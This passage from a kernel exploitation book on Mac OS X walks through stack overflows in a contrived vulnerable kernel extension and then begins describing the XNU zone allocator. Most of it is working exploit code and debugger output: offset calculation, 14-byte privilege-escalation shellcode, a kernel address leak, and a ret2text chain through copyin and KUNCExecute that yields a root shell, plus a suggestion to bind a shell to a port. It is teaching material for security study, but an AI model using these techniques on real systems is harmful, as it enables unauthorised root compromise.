Stack-Based Buffer Overflows

As we described in Chapter 2 a stack-based buffer overflow occurs when you write outside the boundaries of a buffer of memory allocated on the process's stack. When we are able to write controlled data outside a buffer on the stack, we can typically overwrite the stored return address, resulting in arbitrary control of execution when the return address is pulled from the stack and used. (This is typically a RET instruction on Intel x86 architecture.)

To demonstrate techniques for exploiting this situation on a Mac OS X system we have contrived the following example:

#include <sys/types.h>

#include <sys/systm.h>

#include <sys/uio.h>

#include <sys/conf.h>

#include <miscfs/devfs/devfs.h>

#include <mach/mach_types.h>

extern int seltrue(dev_t, int, struct proc *);

static int StackOverflowIOCTL(dev_t, u_long, caddr_t, int, struct proc *);

#define DEVICENAME "stackoverflow"

typedef struct bigstring {

char string1[1024];

} bigstring;

#define COPYSTRING _IOWR('d',0,bigstring);

static struct cdevsw SO_cdevsw = {

(d_open_t *)&nulldev, // open_close_fcn_t *d_open;

(d_close_t *)&nulldev, // open_close_fcn_t *d_close;

(d_read_t *)&nulldev, // read_write_fcn_t *d_read;

(d_write_t *)&nulldev, // read_write_fcn_t *d_write;

StackOverflowIOCTL, // ioctl_fcn_t *d_ioctl;

(d_stop_t *)&nulldev, // stop_fcn_t *d_stop;

(d_reset_t *)&nulldev, // reset_fcn_t *d_reset;

0, // struct tty **d_ttys;

(select_fcn_t *)seltrue, // select_fcn_t *d_select;

eno_mmap, // mmap_fcn_t *d_mmap;

eno_strat, // strategy_fcn_t *d_strategy;

eno_getc, // getc_fcn_t *d_getc;

eno_putc, // putc_fcn_t *d_putc;

D_TTY, // int d_type;

};

static int StackOverflowIOCTL(dev_t dev, u_long cmd, caddr_t data,int flag, struct proc *p)

{

char string1[1024];

printf("[+] Entering StackOverflowIOCTL ");

printf("[+] cmd is 0x%x ",cmd);

printf("[+] Data is @ 0x%x ",data);

printf("[+] Copying in string to string1 ");

sprintf(string1,"Copied in to string1: %s ",data);

printf("finale: %s", string1);

return 0;

}

void *devnode = NULL;

int devindex = −1;

kern_return_t StackOverflow_start (kmod_info_t * ki, void * d)

{

devindex = cdevsw_add(−1, &SO_cdevsw);

if (devindex == −1) {

printf("cdevsw_add() failed ");

return KERN_FAILURE;

}

devnode = devfs_make_node(makedev(devindex, 0),

DEVFS_CHAR,

UID_ROOT,

GID_WHEEL,

0777,

DEVICENAME);

if (devnode == NULL) {

printf("cdevsw_add() failed ");

return KERN_FAILURE;

}

return KERN_SUCCESS;

}

kern_return_t StackOverflow_stop (kmod_info_t * ki, void * d)

{

if (devnode != NULL) {

devfs_remove(devnode);

}

if (devindex != −1) {

cdevsw_remove(devindex, &SO_cdevsw);

}

return KERN_SUCCESS;

}

This is the code for a kernel extension that registers a device with the (extremely original) name “/dev/stackoverflow”. It then registers an IOCTL for the device. The IOCTL reads in a string from the third argument, data, and copies it into a buffer on the stack using the sprintf() function. The sprintf() function is dangerous because it has no way to know the size of the destination buffer. It simply copies byte for byte until a NULL value is reached (x00). Due to this behavior, we can cause this kernel extension to write outside the bounds of the string1 buffer and overwrite the stored return address on the stack to control execution. The first thing we need to check before we attempt to exploit this is the file permissions on our device file:

-[root@macosxbox]$ ls -lsa /dev/stackoverflow

0 crwxrwxrwx 1 root wheel 19, 0 Nov 27 22:43 /dev/stackoverflow

Good news—this file is readable/writable and executable by everyone. We could also have verified this by looking at the code responsible for setting up this device file: the value 0777 was passed in for file permissions.

The next step we can take is to create a program to trigger the overflow. To do this, we need to call the ioctl() function passing in our long string as the third data parameter. The following code demonstrates this:

#define BUFFSIZE 1024

typedef struct bigstring {

char string1[BUFFSIZE];

} bigstring;

int main(int argc, char **argv)

{

int fd;

unsigned long *ptr;

bigstring bs;

if((fd = open ("/dev/stackoverflow", O_RDONLY)) == −1 ) {

printf("error: couldn't open /dev/stackoverflow ");

exit(1);

}

memset(bs.string1,'A',BUFFSIZE−1);

bs.string1[BUFFSIZE−1] = 0;

printf("data is: %s ",bs.string1);

ioctl(fd, COPYSTRING,&bs);

}

If we compile and execute this code with a debugger attached, we can see that we have overwritten the saved return address and it has been restored to EIP. Hence, EIP's value, 0x41414141, is the ASCII code representation of “AAAA”.

(gdb) c

Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.

0x41414141 in ?? ()

Now that we know how to trigger the vulnerability, we must work out how to control execution in such a way that we can gain root privileges on the system and leave it in a stable state so that we can enjoy them for good. We begin by calculating the offset into our attack string that is responsible for overwriting the return address on the stack. This will allow us to specify arbitrary values for it. We accomplish this by first dumping an assembly listing for our IOCTL:

Dump of assembler code for function StackOverflowIOCTL:

0x00000000 <StackOverflowIOCTL+0>: push ebp

0x00000001 <StackOverflowIOCTL+1>: mov ebp,esp

0x00000003 <StackOverflowIOCTL+3>: push ebx

0x00000004 <StackOverflowIOCTL+4>: sub esp,0x414

0x0000000a <StackOverflowIOCTL+10>: mov ebx,DWORD PTR [ebp+0x10]

0x0000000d <StackOverflowIOCTL+13>: mov DWORD PTR [esp],0x154

0x00000014 <StackOverflowIOCTL+20>: call 0x0 <StackOverflowIOCTL> // printf

[…]

0x00000048 <StackOverflowIOCTL+72>: mov DWORD PTR [esp+0x8],ebx

0x0000004c <StackOverflowIOCTL+76>: lea ebx,[ebp-0x408]

0x00000052 <StackOverflowIOCTL+82>: mov DWORD PTR [esp],ebx

0x00000055 <StackOverflowIOCTL+85>: mov DWORD PTR [esp+0x4],0x1c8

0x0000005d <StackOverflowIOCTL+93>: call 0x0 <StackOverflowIOCTL> // sprintf

0x00000062 <StackOverflowIOCTL+98>: mov DWORD PTR [esp+0x4],ebx

0x00000066 <StackOverflowIOCTL+102>: mov DWORD PTR [esp],0x1e4

0x0000006d <StackOverflowIOCTL+109>: call 0x0 <StackOverflowIOCTL> // printf

0x00000072 <StackOverflowIOCTL+114>: add esp,0x414

0x00000078 <StackOverflowIOCTL+120>: xor eax,eax

0x0000007a <StackOverflowIOCTL+122>: pop ebx

0x0000007b <StackOverflowIOCTL+123>: leave

0x0000007c <StackOverflowIOCTL+124>: ret

Each function call in the listing is pointing to location 0x0. This is because the kernel extension will be relocated in the kernel, and the call instructions are patched in at runtime. Regardless, we know from the source that the second-to-last call instruction is our sprintf() (we added comments to make that clearer). By analyzing the arguments being pushed to the stack, we can see that our destination buffer is accessed at the location EBP-0x408 (at 0x0000004c).

0x0000004c <StackOverflowIOCTL+76>: lea ebx,[ebp-0x408]

0x00000052 <StackOverflowIOCTL+82>: mov DWORD PTR [esp],ebx

This means that after writing 0x408 (1,032) bytes, we will reach the stored frame pointer (EBP) on the stack; then, after another four bytes, we will reach the stored return address. Therefore, we can calculate the offset as follows:

memset(bs.string1,'x90',BUFFSIZE−1);

bs.string1[BUFFSIZE−1] = 0;

unsigned int offset = 0x408 − strlen("Copied in to string1: ") + 4;

ptr = (char *)(bs.string1 + offset);

*ptr = 0xdeadbeef;

If we compile and execute this code, this time in our debugger, we can see that we overwrote the return address with 0xdeadbeef, as expected:

(gdb) c

Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.

0xdeadbeef in ?? ()

The next step in our exploitation process is to position the shellcode somewhere in the kernel's address space and calculate its address. To achieve this we'll use a variant of the proc command-line technique that was presented in the “Kernel Exploitation Notes” article in PHRACK 64 while targeting the UltraSPARC/Solaris scenario. Here we'll use the p_comm element of the process structure to store our shellcode, and then calculate its address before exploitation.

struct proc {

LIST_ENTRY(proc) p_list;

/* List of all processes. */

pid_t p_pid;

/* Process identifier. (static)*/

char p_comm[MAXCOMLEN+1];

char p_name[(2*MAXCOMLEN)+1]; /* PL * /

}

The p_comm element of the proc struct contains the first 16 bytes of the filename of the binary being executed. To utilize this for our exploit, we can use the link() function to create a hard link to our exploit with any name we choose, and then reexecute it. We can implement this with the following code:

char *args[] = {shellcode,"--own-the-kernel",NULL};

char *env[] = {"TERM=xterm",NULL};

printf("[+] creating link. ");

if(link(av[0], shellcode) == −1)

{

printf("[!] failed to create link. ");

exit(1);

}

execve(*args,args,env);

We passed the –own-the-kernel flag to our program the second time to signal to our process that it's being run with shellcode in p_comm so that it can begin stage 2 of the exploitation process.

Now that we know where to store our shellcode, we need to work out how to calculate its address before we trigger our buffer overflow. Again, the task is not much different from the UltraSPARC/Solaris case. The KERN_PROC sysctl will allow us to leak the address of the proc struct for our process. The following function will utilize this sysctl to retrieve the address of the proc struct for a given process ID:

long get_addr(pid_t pid) {

int i, sz = sizeof(struct kinfo_proc), mib[4];

struct kinfo_proc p;

mib[0] = CTL_KERN;

mib[1] = KERN_PROC;

mib[2] = KERN_PROC_PID;

mib[3] = pid;

i = sysctl(&mib, 4, &p, &sz, 0, 0);

if (i == −1) {

perror("sysctl()");

exit(0);

}

return(p.kp_eproc.e_paddr);

}

To locate the address of p_comm from here, we simply need once again to calculate the proper offset, in this case 0x1A0, to add to the proc struct address. This leaves us with the following code:

void *proc = get_addr(getpid());

void *ret = proc + 0x1a0;

Since p_comm allows us only 16 bytes of storage space for our shellcode, we either need to chain multiple pieces of shellcode together, executing multiple processes, or write some really compact shellcode to accomplish what we need. For this example, we will use some compact shellcode to elevate our privileges to root, since, as it turns out, 16 bytes is more than enough room to do what we need.

Because we know at the time of execution that the ESP register will be pointing to the end of our attack string, we can pass in the address of the proc struct. This way, our shellcode will not have to locate the proc struct itself, shaving off several bytes of code. Therefore, we can start our shellcode by simply popping the address of the proc struct from the stack:

pop ebx // get address of proc

From here, we need to once again use a static offset and seek 0x64 bytes into the proc struct to retrieve the u_cred structure address, then offset this by 16 and write 0 into it to gain root privileges. We set EAX to 0, and use this to write to the UID, as this makes the shellcode smaller than simply moving 0.

xor eax,eax // zero out eax

mov ebx,[ebx+0x64] // get u_cred

mov [ebx+0x10],eax // uid=0

Now that we upgraded our UID to gain root privileges, we are nearly done. However, we cannot just return neatly to our previous stack frame as we have corrupted the stack. If we tried to issue the RET instruction it would simply pop an address from the stack and use it, most likely resulting in a kernel panic. To finish our shellcode we need to return to an address that will result in us exiting kernel space cleanly so that we can actually use our root privileges to some effect. One suitable way to accomplish this is to return to the kernel .text located function called thread_exception_return(). This function is called at the end of unix_syscall() and is responsible for transferring execution back to user space as though returning from an exception. It suits our needs perfectly. However, as with all of the functions in the kernel .text segment, the address it is located at contains a NULL byte as its first byte.

-[luser@macosxbox]$ nm /mach_kernel | grep thread_exception_return

001a14d0 T _thread_exception_return

This will cause a problem for us, because when the sprintf() function reaches the x00 byte of the address, it will terminate the copy. That's a bummer. Fortunately, mitigating this issue is not too complicated. We can encode the address of our function and decode it in our shellcode. To begin this process we must first write a function to retrieve the address of the thread_exception_return() function from the mach_kernel binary. Once again, we can do this by using the nm command:

u_long get_exit_kernel()

{

FILE *fp = popen("nm /mach_kernel | grep thread_exception_return", "r");

u_long addr = 0;

fscanf(fp,"%x ",&addr);

printf("[+] thread_exception_return is @ 0x%x ",addr);

return addr;

}

Now we must encode the address to remove the NULL byte. We can do this by shifting the address to the left by eight. This will move the whole address one byte to the left, leaving a NULL byte on the right-hand side instead of the left. We can then add 0xff to it to remove the NULL byte on the end.

void *exit_kernel = get_exit_kernel();

(unsigned long)exit_kernel <<= 8;

(unsigned long)exit_kernel |= 0xff;

In our quest for optimization, rather than passing this value to our shellcode on the stack (and requiring us to pop it off before use) we can take the fact that we are clobbering EBP, which is taken from the stack we've overwritten, and pass this value as the new EBP. This way, in our shellcode, we simply need to shift the EBP register to the right by eight to decode it, and then jump to it to exit the kernel.

shr ebp,8 // replace the null byte in our address.

jmp ebp // call our kernel exit function.

Putting all of this together gives us the following shellcode:

char shellcode[] = "x5bx31xc0x8Bx5Bx64x89x43x10xc1xedx08xffxe5";

This code is 14 bytes in length, which easily meets our 16-byte limitation.

Finally, our code needs to set up the attack string with the address of our proc struct and kernel exit function. Here is the complete code to do this:

unsigned int offset = 0x408 - strlen("Copied in to string1: ");

ptr = (char *)(bs.string1 + offset);

*ptr = exit_kernel;

*(++ptr) = ret;

*(++ptr) = proc;

After our ioctl() is called, our exploit can execve() /bin/sh to grant a shell with root privileges. If we compile and execute our completed exploit, we receive the following output:

-[luser@macosxbox]$ ./so

[+] creating link.

[+] thread_exception_return is @ 0x1a14d0

[+] exit_kernel tmp: 0x1a14d0ff

[+] pid: 293

[+] proc @ 0x329c7e0

[+] p_comm @ 0x329c980

uid: 0 euid: 501

sh-3.2# id

uid=0(root) gid=0(wheel)

Great! Once again, we are granted a very usable root shell. The full code listing for this exploit and for the vulnerable kernel extension is available at www.attackingthecore.com.

If our stack smash hadn't relied on the sprintf() function, and instead utilized a memory copy function that wasn't string-based (such as memcpy()), we could have gone about the exploitation in a different fashion. Since the NULL byte issued in the kernel .text addresses wouldn't have been a problem, we could have returned execution directly to kernel functionality to gain root privileges. To make this clearer, instead of using sprintf() we can change our example kernel extension to read a pointer and length as its argument, and copyin() that amount into a fixed stack buffer.

Our new kext interprets data as the following structure:

typedef struct datastruct {

void *data;

unsigned long size;

} datastruct;

And it uses it as shown in the following code:

static int StackSmashNoNullIOCTL(dev_t dev, u_long cmd, caddr_t data,int flag, struct proc *p)

{

char buffer[1024];

datastruct *ds = (datastruct *)data;

memset(buffer,'x00',1024);

if(sizeof(data) > 1024){

printf("error: data too big for buffer. ");

return KERN_FAILURE;

}

if(copyin((void *)ds->data, (void *)buffer, ds->size) == −1){

printf("error: copyin failed. ");

return KERN_FAILURE;

}

printf("Success! ");

return KERN_SUCCESS;

}

It casts data as a datastruct and then checks if sizeof(data) > 1024. Although this is a contrived example, this is a rather common mistake. data is a pointer in this example, and therefore sizeof(data) will return the natural size of the architecture of choice. In this case, it will return 4, and the check will always be false. Finally, the code uses the copyin() function to copy an arbitrarily supplied length of data into a buffer on the stack. As we mentioned earlier, this copy will not be terminated by encountering a NULL byte, so we are free to return to the kernel .text as much as we want.

Note

Interestingly, in this case auditing the binary would be much clearer than the source code, as GCC will automatically optimize the check for sizeof(ptr) > 1024. By reading the disassembly of the binary, we would find no check at all.

Again, our first step in developing an exploit for this issue is to dump an assembly listing for our kext and find a reference to our destination buffer:

0x0000000e <StackSmashNoNullIOCTL+14>: lea -0x408(%ebp),%ebx // dst

0x00000014 <StackSmashNoNullIOCTL+20>: movl $0x400,0x8(%esp) //length

0x0000001c <StackSmashNoNullIOCTL+28>: movl $0x0,0x4(%esp) // 'x00'

0x00000024 <StackSmashNoNullIOCTL+36>: mov %ebx,(%esp) // dst

0x00000027 <StackSmashNoNullIOCTL+39>: call 0x0 <StackSmashNoNullIOCTL> memset();

Since we know the first function call, memset(), uses our buffer as its destination argument, it makes sense to look at this. We can clearly see that our buffer begins 0x408 bytes from the stored frame pointer on the stack. Therefore, we can define the following:

#define OFFSET 0x40c

#define BUFFSIZE (OFFSET + sizeof(long))

Next, we can throw together a quick proof of concept to trigger the vulnerability. This code looks pretty similar to our previous example. The attack string is created with 0xdeadbeef positioned so as to overwrite the stored return address on the stack.

datastruct ds;

unsigned char attackstring[BUFFSIZE];

unsigned long *ptr;

memset(attackstring,'x90',BUFFSIZE);

ds.data = attackstring;

ds.size = BUFFSIZE;

ptr = &attackstring[OFFSET];

*ptr = 0xdeadbeef;

ioctl(fd, DATASTRUCT,&ds);

If we compile and execute our code, we can see that EIP is replaced with 0xdeadbeef and we have arbitrary control of execution flow. Now that we control execution, we need to work out once again where we want to return to in order to gain root privileges. As we mentioned at the beginning of this section, since NULL bytes are not an issue in this case, we can freely return to the kernel .text segment. Therefore, we start looking for a way to execute something under our control. The search leads us to the KUNCExecute() function.

The kernel uses this function to communicate over a Mach port (com.apple.system.Kernel[UNC]Notifications) with a daemon (/usr/libexec/kuncd) running in user space, and tells it to execute an application. The KUNCExecute() function takes three arguments:

  1. executionPath A string containing the path to the application you want to be executed. The third parameter dictates the format of this argument.

  2. openAsUser Describes which user account the process will be executed as. The choices are kOpenAppAsConsoleUser or kOpenAppAsRoot. For our purposes, we typically want to go with kOpenAppAsRoot.

  3. pathExecutionType Changes how kuncd will execute the application and can be one of three choices:

    1. kOpenApplicationPath, which means we must specify a full path to the application

    2. kOpenPreferencesPanel, which means we want to open a preferences panel and display it to the user

    3. kOpenApplication, which causes kuncd to use /usr/bin/open to start the application, and doesn't require the full path

The first thing that springs to mind after reading this description is that we can use p_comm in the proc struct to hold the path to the application, and then simply return to KUNCExecute() passing the address of p_comm as the first argument.

That's a good idea. Unfortunately, it turns out that we cannot use p_comm to store anything containing the character “/”. This means we cannot store a full path this way. An obvious solution to this is to use the kOpenApplication flag for argument 3. This flag indicates that the string in argument 1 contains the name of an application to open with /usr/bin/open, and this can be in a multitude of user-controlled paths.

Again, that's a good idea. Unfortunately, although this technique will result in an application being executed, whenever open is used to start an application its uid/euid defaults to that of the currently logged in console user, even if the open application itself is initially invoked as the root user. This essentially means we will need to find a new place to store our string, and we will need to find a reliable way to store it there. It looks like we need to keep our thinking hat on a little longer.

What do we have? We have a way to jump everywhere in the kernel .text segment. What do we need? We need to store an arbitrary string somewhere. Does the kernel need to do that in its normal, routine execution? Indeed it does—for example, each time it needs to bring in parameters from user land. How does it accomplish this? In a word: copyin(). So, how about returning, prior to calling KUNCExecute(), into the copyin() function? This way, we can copy our string into a fixed location in the kernel from user space.

That sounds good, but we must decide where to write our string. This solution is easy and we already know it. We can use the memory location of iso_font[] that we used in the arbitrary kernel memory write scenario to store our string.

Since we now have to resolve quite a few symbols, we can simplify things by creating a generic get_symbol() function to retrieve an arbitrary symbol from /mach_kernel. Here is the required function:

u_long get_symbol(char *symbol)

{

#define NMSTRING "nm /mach_kernel | grep "

unsigned int length = strlen(NMSTRING) + strlen(symbol) + 4;

char *buffer = malloc(length);

FILE *fp;

if(!buffer){

printf("error: allocating symbol string ");

exit(1);

}

snprintf(buffer,length-1,NMSTRING"%s",symbol);

fp = popen(buffer, "r");

u_long addr = 0;

fscanf(fp,"%x ",&addr);

printf("[+] %s is @ 0x%x ",symbol,addr);

free(buffer);

return addr;

}

Next, we have to work out how our attack string will look to call our functions. In other words, we need to chain together a few function calls.

We need, at minimum, copyin() followed by KUNCExecute() followed by thread_exception_return(). This causes a problem, however. When chaining calls to existing functions from a stack overflow, it is easy to position two return addresses back to back on the stack, followed by the arguments, and both functions will be called. However, once three or more functions are needed, after the epilog of the second function is executed, the stack pointer will be positioned pointing to the first argument to the first function. This means that when the RET instruction is executed it will result in execution being transferred to whatever is stored in the first argument. This is not ideal for our current technique. There are documented methods for calling as many functions as are needed in this manner; however, each brings its own complications and limitations to the table.

Again, we need to put on our thinking hat. In the case of our vulnerability, there is a much easier solution to this problem. We can simply trigger the buffer overflow twice: once with our call to copyin(), and a second time by our exit_kernel function (thread_exception_return()) to write our string into memory. The second time, we trigger it with the address of KUNCExecute() and our exit_kernel again. To set up our fake stack frames, we will need to have some way to represent them in our code. To organize this, we can create a fake_frame structure, holding the function we wish to call, followed by the address of exit_kernel, followed by our arguments.

struct fake_frame {

void *function;

void *exit_kernel;

unsigned long arg1;

unsigned long arg2;

unsigned long arg3;

unsigned long arg4;

};

To accommodate our first call to copyin() we can set up our structure as shown in the following code. There are four arguments to copyin(), rather than the three arguments you would expect to see, because GCC performs some very strange optimizations to the copyin() function. Because copyin() is just a wrapper around copyio(), GCC compiles copyin() to receive four arguments, and then moves the second one into ECX and uses JMP to access the copyio() function. Setting this argument to 0 is an acceptable way to make our copyin() call work as expected.

struct fake_frame ff,*ffptr;

ff.function = get_symbol("copyin");

ff.arg1 = av[1];

ff.arg2 = 0; //av[1] / (0x1f * 2);

ff.arg3 = get_symbol("iso_font");

ff.arg4 = strlen(av[1]) + 1;

// Add a call to exit_kernel

ff.exit_kernel = get_symbol("thread_exception_return");

ffptr = (struct fake_frame *)&attackstring[OFFSET];

memcpy(ffptr,&ff,sizeof(ff));

ioctl(fd, DATASTRUCT,&ds);

As the code shows, we then point an ffptr struct pointer at our attack string, and memcpy() our structure into it. Finally, we call the ioctl() as we did previously to trigger our overflow. We have taken care to write the exploit in such a way that the command to be executed can be passed in on the command line.

If we pause execution at this stage, we can see that the iso_font[] buffer now contains the string we passed to our exploit:

(gdb) x/s &iso_font

0x4face0 <iso_font>: "MY_COMMAND_HERE"

Now it's time to take care of our second function call. We need to set up our fake_frame struct in almost the same way we set up the previous struct. This time, however, we need to replace our function address with that of KUNCExecute(). By including the UserNotification/KUNCUserNotifications.h header file in our program, we can use the kOpenAppAsRoot and kOpenApplicationPath constants in our exploit directly (the alternative would be to hardcode their values in the code, but this way we are a lot more resistant to potential value changes over time).

#include <UserNotification/KUNCUserNotifications.h>

// Set up our KUNCExecute

ff.function = get_symbol("KUNCExecute");

ff.arg1 = get_symbol("iso_font");

ff.arg2 = kOpenAppAsRoot;

ff.arg3 = kOpenApplicationPath;

// Add a call to exit_kernel

ff.exit_kernel = get_symbol("thread_exception_return");

ffptr = (struct fake_frame *)&attackstring[OFFSET];

memcpy(ffptr,&ff,sizeof(ff));

ioctl(fd, DATASTRUCT,&ds);

Now that we have developed exploit code to exploit this vulnerability, we need a way to test it. To facilitate this we must create a binary of some kind that will let us know that we have root privileges. A very simple way to do this is to just execute the touch command to touch a file at a known location. That way, we can check the file permissions and ownership details on the file after exploitation to see what privileges our process ran with. Here is some simple code to do just that:

#include <stdio.h>

#include <stdlib.h>

int main(int ac, char **av)

{

char *args[] = {"/usr/bin/touch","/tmp/hi",NULL};

char *env[] = {"TERM=xterm",NULL};

execve(*args,args,env);

}

After compiling our test code and moving it to /Users/luser/book/Backdoor, we can run our exploit, passing the path to this binary as the first argument on the command line:

-[luser@macosxbox:~/book]$ ./ret2text /Users/dcbz/book/Backdoor

[+] copyin is @ 0x19f38e

[+] iso_font is @ 0x4face0

[+] thread_exception_return is @ 0x1a14d0

[+] KUNCExecute is @ 0x1199da

[+] iso_font is @ 0x4face0

[+] thread_exception_return is @ 0x1a14d0

Finally, if we check the ownership and permissions on this file, we can see that it is owned by root:wheel. This means our privilege escalation was successful.

-[luser@macosxbox]$ ls -lsa /tmp/hi

0 -rw-r- -r- - 1 root wheel 0 Dec 1 10:30 /tmp/hi

Obviously, we need to gain a root shell from this point to modify our Backdoor.c code to either bind a shell to a port, or change the permissions on itself to grant it suid-root privileges. The possibilities are endless for this.

Memory Allocator Exploitation

Now that we've covered arbitrary memory games and stack-based exploitation, it is time to move to the kernel heap and focus on exploitation of some of the memory allocators available in XNU.

The first allocator we will target is the zone allocator. A zone allocator is a memory allocator that is specifically designed for fast/efficient allocation of identically sized objects. We will look at this allocator first because it is also the fundamental groundwork for the kmalloc() allocator. The source code for this memory allocator is available in the osfmk/kern/zalloc.c file within the XNU source tree. Many of the major structs in the XNU kernel utilize the zone allocator to allocate space. Some examples of these are the task structs, the thread structs, the pipe structs, and even the zone structs used by the zone allocator itself.

The zone allocator exports an API to user space for querying the state of the zones at runtime. The function responsible for this is named host_zone_info(). Mac OS X ships with a utility, /usr/bin/zprint, which you can use to display this information from the command line. It's also an excellent way to see types of objects that are utilizing this allocator by default.

-[luser@macosxbox]$ zprint

elem cur max cur max cur alloc alloc

zone name size size size #elts #elts inuse size count

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

zones 388 51K 52K 136 137 116 8K 21

vm.objects 140 463K 512K 3393 3744 3360 4K 29 C

x86.saved.state 100 23K 252K 244 2580 137 12K 122 C

uthreads 416 63K 1040K 156 2560 137 16K 39 C

alarms 44 0K 4K 0 93 0 4K 93 C

mbuf 256 0K 1024K 0 4096 0 4K 16 C

socket 408 55K 1024K 140 2570 82 4K 10 C

zombie 72 7K 1024K 113 14563 0 8K 113 C

cred 136 3K 1024K 30 7710 21 4K 30 C

pgrp 48 3K 1024K 85 21845 37 4K 85 C

session 312 15K 1024K 52 3360 36 8K 26 C

vnodes 144 490K 1024K 3485 7281 3402 12K 85 C

proc 596 39K 1024K 68 1759 41 20K 34 C

Before we look at exploiting overflows into this allocator, we need to briefly run through how the allocator works. We will start by walking through the interfaces the zone allocator offers to set up a cache of objects.

First we need to set up a zone with information about the type of object we wish to store in it. We can do this using the zinit() function, the prototype of which looks like this:

zone_t

zinit(

vm_size_t size, /* the size of an element */

vm_size_t max, /* maximum memory to use */

vm_size_t alloc, /* allocation size */

const char *name) /* a name for the zone */

Each argument is pretty self-explanatory: the size provided here will dictate the size of each chunk in the zone; the name passed in as the fourth argument will be visible in the zprint output from user space.

This function essentially begins by checking if this is the first zone on the system. If it is, zones_zone will not have been created yet. If this is the case, zinit() will create a zone to hold its own data. If this is not the case, zalloc() will be used to allocate room for information about this zone from zones_zone. This allocation will provide room to store our zone structure. The format of the zone struct is as follows:

struct zone {

int count; /* Number of elements used now */

vm_offset_t free_elements;

decl_mutex_data(,lock) /* generic lock */

vm_size_t cur_size; /* current memory utilization */

vm_size_t max_size; /* how large can this zone grow */

vm_size_t elem_size; /* size of an element */

vm_size_t alloc_size; /* size used for more memory */

unsigned int

/* boolean_t */ exhaustible:1, /* (F) merely return if empty? */

/* boolean_t */ collectable:1, /* (F) garbage collect empty pages */

/* boolean_t */ expandable:1, /* (T) expand zone (with message)? */

/* boolean_t */ allows_foreign:1, /* (F) allow non-zalloc space */

/* boolean_t */ doing_alloc:1, /* is zone expanding now? */

/* boolean_t */ waiting:1, /* is thread waiting for expansion? */

/* boolean_t */ async_pending:1, /* asynchronous allocation pending? */

/* boolean_t */ doing_gc:1; /* garbage collect in progress? */

struct zone * next_zone; /* Link for all-zones list */

call_entry_data_t call_async_alloc;

/* callout for asynchronous alloc */

const char *zone_name; /* a name for the zone */

#if ZONE_DEBUG

queue_head_t active_zones; /* active elements */

#endif /* ZONE_DEBUG */

};

After allocating room for the zone struct, zinit() will populate it with some basic initialization data:

z->free_elements = 0;

z->cur_size = 0;

z->max_size = max;

z->elem_size = size;

z->alloc_size = alloc;

z->zone_name = name;

z->count = 0;

z->doing_alloc = FALSE;

z->doing_gc = FALSE;

z->exhaustible = FALSE;

z->collectable = TRUE;

z->allows_foreign = FALSE;

z->expandable = TRUE;

z->waiting = FALSE;

z->async_pending = FALSE;

The most important element of this structure for us to keep in mind during exploitation is the free_elements attribute. During the zinit() initialization, this is set to 0. This indicates that there are no chunks on the free list.

Once zinit() is complete, our zone is set up and available for allocations. The zalloc() function is typically used to allocate a chunk of memory from our zone. However, there is also a function called zget() that will acquire memory from the zone without blocking. When zalloc() is called, the first thing it does is check the free_elements attribute of the zone struct to see if there is anything on the free list. If there is, it will use the REMOVE_FROM_ZONE() macro to remove the element from the free list, and return it:

#define REMOVE_FROM_ZONE(zone, ret, type)

MACRO_BEGIN

(ret) = (type) (zone)->free_elements;

if ((ret) != (type) 0) {

if (!is_kernel_data_addr(((vm_offset_t *)(ret))[0])) {

panic("A freed zone element has been modified. ");

}

(zone)->count++;

(zone)->free_elements = *((vm_offset_t *)(ret));

}

MACRO_END

#else /* MACH_ASSERT */

The REMOVE_FROM_ZONE() macro simply returns the free_elements pointer from the zone struct. It then dereferences it and updates the zone struct with the address of the next free chunk. A check is in place to make sure the address points to kernel space: is_kernel_data_addr(). However, this check is fairly useless, as it basically only ends up checking that the address is between 0x1000 and 0xFFFFFFFF. It also checks that the address is word-aligned (!(address & 0x3)). This really provides very few limitations when it comes to exploitation. Before the address is returned to the callee, however, the memory is block-zeroed. This causes some issues for exploitation; we will look at them in more detail later in this section.

If there is no element on the free list, zalloc() will take the next chunk in order from the mapping zinit() created to be divided. When a mapping is used entirely, yet the free list is emptied, the allocator uses the kernel_memory_allocate() function to create a new mapping. This is similar to a memory allocator using the brk() or mmap() function from user space.

As we would expect, the opposite of a zalloc() call is to use the zfree() function. This will add an element back to the zone free_elements list. This function uses several sanity checks to make sure the pointer being free()'ed belongs to kernel memory and came from the zone passed to the function. Again, when accessing the free_elements list a macro is used; this time it is ADD_TO_ZONE():

#define ADD_TO_ZONE(zone, element)

MACRO_BEGIN

if (zfree_clear)

{ unsigned int i;

for (i=1;

i < zone->elem_size/sizeof(vm_offset_t) - 1;

i++)

((vm_offset_t *)(element))[i] = 0xdeadbeef;

}

((vm_offset_t *)(element))[0] = (zone)->free_elements;

(zone)->free_elements = (vm_offset_t) (element);

(zone)->count--;

MACRO_END

This macro begins by writing the value 0xdeadbeef incrementally in 4-byte intervals through the memory region being free()'ed. After this, it writes the current value of the free_list element of the zone struct, into the start of the newly free()'ed element. Finally, it writes the address of the element being free()'ed back to the zone struct's free_elements attribute, updating the free list head.

To give you a better understanding of the free list, Figure 5.18 shows the relationship. The list is a singly linked list. The zone struct element free_elements contains the list head. Each free element points to the next free element in turn, as you can see in the figure.

Image

Figure 5.18 Singly linked free list

This description should be enough to provide a basic example of an overflow into a zone. Again, since there are no public examples of vulnerabilities like this, we will contrive an example for educational purposes. To do this, we can modify our memcpy()-based example kext from the “Stack-Based Buffer Overflows” section. Rather than allocating the buffer on the stack, we can make a buffer zone and allocate a new buffer in it each time our IOCTL is called.

The first change we need to make is to add a call to zinit() in the start function of our kernel extension. We'll use the following arguments:

#define BUFFSIZE 44

buff_zone = zinit(

BUFFSIZE, /* the size of an element */

(BUFFSIZE * MAXBUFFS) + BUFFSIZE, /* maximum memory to use */

0, /* allocation size */

"BUFFERZONE")

As you can see, this creates a zone called BUFFERZONE in which to store our data.

We then define two different commands for our IOCTL: ADDBUFFER to perform a new allocation, and FREEBUFFER to zfree() one of our allocated buffers.

#define ADDBUFFER _IOWR('d',0,datastruct)

#define FREEBUFFER _IOWR('d',1,datastruct)

Next, in our IOCTL code, we add a switch statement to determine which command is being used. If ADDBUFFER is passed in, we perform the same failed check on the length field from the stack example, and then copy data from user space straight into our freshly allocated buffer. We also use an extra element in our kern_ptr data struct as a unique ID for our buffers array. This value is leaked back to user space, and provides some interesting insight into what's going on.

